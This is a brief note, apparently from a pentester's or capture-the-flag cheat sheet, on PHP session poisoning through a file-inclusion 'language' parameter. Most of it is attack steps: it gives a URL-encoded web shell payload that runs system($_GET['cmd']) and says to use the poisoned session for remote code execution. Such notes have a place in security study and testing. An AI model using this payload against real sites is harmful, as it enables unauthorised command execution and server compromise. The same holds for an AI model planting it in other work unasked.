PHP Session Poisoning

we have to control the file http://:/index.php?language=session_poisoning

use that file to send malicious webshel http://:/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

finally use that sessions to rce